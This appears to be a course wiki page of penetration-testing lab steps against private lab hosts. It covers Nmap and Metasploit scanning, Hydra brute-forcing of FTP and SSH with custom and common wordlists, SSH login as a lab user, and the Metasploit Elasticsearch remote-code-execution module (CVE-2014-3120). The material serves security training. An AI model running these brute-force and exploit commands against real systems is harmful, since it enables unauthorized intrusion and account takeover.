-
Notifications
You must be signed in to change notification settings - Fork 26
z‐ old Labs
Dean Bushmiller edited this page Jun 20, 2024
·
1 revision
- You may do unsupported local lab
- You should do AWS remote lab
- Capture user information to build user list
- As we go populate artifact sheet https://docs.google.com/spreadsheets/d/1PMK589QX5tC9KAMsuoTnR2uVhEVh8830xJNC0N0zdyM/edit#gid=0
- Collect social media or public data
- think of all the ways admins build user logins - populate user list on sheet
- think of all ways to make a bad password, or login use to populate password list
- You are doing what a tester does.
- You are need to put in 1000 hours of deliberate practice to be a pen tester
- This is a walk in the park, not building a park
- Load user list into Kali with wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt
- cat expsecusers.txt
-
Victim IP addresses: 10.0.0.10 & 10.0.0.21 (2)
-
Using Metasploit and Nmap together as a scanner
-
IN KALI
-
@ $
-
bash
-
this is an insecure shortcut for production systems
-
sudo -i
-
@ root
-
msfconsole
-
@ msf6>
-
color true
-
db_nmap -sS -A 10.0.0.10-21
-
services
-
Document
-
IN Artifact repository Manually (google sheet/ YOUR copy and paste)
-
Copy output to Vulnerabilities 1 tab (still unconfirmed)
-
https://docs.google.com/spreadsheets/d/1PMK589QX5tC9KAMsuoTnR2uVhEVh8830xJNC0N0zdyM/edit?usp=sharing
-
Reformat
-
IN KALI
-
@ msf6>
-
exit
-
!!!done!!!
- IN KALI
- @ root
-
apt -y install seclists
-
seclists -h
- Upload expsec possible user list & custom password list
- Shortcut: I put cleaned expsec (this takes planning & process)
- User list on AWS S3
- ` Using wget & moving into correct directory
- IN KALI
- @ root
-
wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt
-
mv expsecusers.txt /usr/share/seclists/Usernames/
-
wget https://ceh-v11-20220609.s3.amazonaws.com/expsec-passwords.txt
-
mv expsec-passwords.txt /usr/share/seclists/Passwords/
- !!!done!!!
- Using hydra
- From Scan: Port 21 & 22 are open on .10 & .21
- From seclist we have multiple list (one real short, one fake because the lab can't take 122 hrs)
- make 2 target lists by echoing data into a file
- IN KALI
- @ root
-
echo '10.0.0.10:21' >> targetsFTP.txt
-
echo '10.0.0.21:21' >> targetsFTP.txt
-
echo '10.0.0.10:22' >> targetsSSH.txt && echo '10.0.0.21:22' >> targetsSSH.txt
- verify your file contents
-
cat targetsFTP.txt
-
cat targetsSSH.txt
- verify if you are in /usr/share/seclist (see 2 target files above)
-
ls
- Use 1 famous list of passwords & a custom list
- How long does first take?
-
hydra -L ./Usernames/expsecusers.txt -P ./Passwords/xato-net-10-million-passwords-100.txt -M targetsFTP.txt ftp
-
hydra -L ./Usernames/expsecusers.txt -P ./Passwords/expsec-passwords.txt -M targetsFTP.txt ftp
-
hydra -L ./Usernames/expsecusers.txt -P ./Passwords/expsec-passwords.txt -M targetsSSH.txt ssh
- Who do we get?
- Document
- IN Artifact repository Manually (google sheet/ your copy and paste)
- Copy output to Vulnerabilities 1 tab (still unconfirmed)
- Reformat
- !!!done!!!
- ProFTPD 1.3.5
- Oracle Glassfish Application Server
- wap-wsp / port 9200
- (for last one google: what is wap-wsp / port 9200)
- Research using:
- https://nvd.nist.gov/vuln/search or https://www.cvedetails.com/
- https://www.exploit-db.com/
- Document
- IN Artifact repository Manually (google sheet/ your copy and paste)
- !!!done!!!
- We have SSH so we can do anything. But we are not.
- Start a SSH instance and escalate priv.
- IN KALI
- @ root
-
ssh 10.0.0.21 -l boba_fett
- Supply password from your Artifact's sheet
-
CTRL Z
- You now have a remote shell on the windows victim ( it will NOT act like your Kali terminal)
- What you can do depends on microsoft administrator skills.
- Exploit port 9200
- IN KALI
- @ msf6>
- ? what services have we captured
-
services
- ? use exploit (CVE-2014-3120)
- I am not giving you the settings for set ( you must think and apply what you have learned)
-
use exploit/multi/elasticsearch/script_mvel_rce
-
set RHOST
-
set LHOST
-
set RPORT
-
set LPORT 4444
- normally we set PAYLOAD but we are trying to verify exploit only
-
run
- returned message: Exploit completed, but no session was created.
- !!!done!!!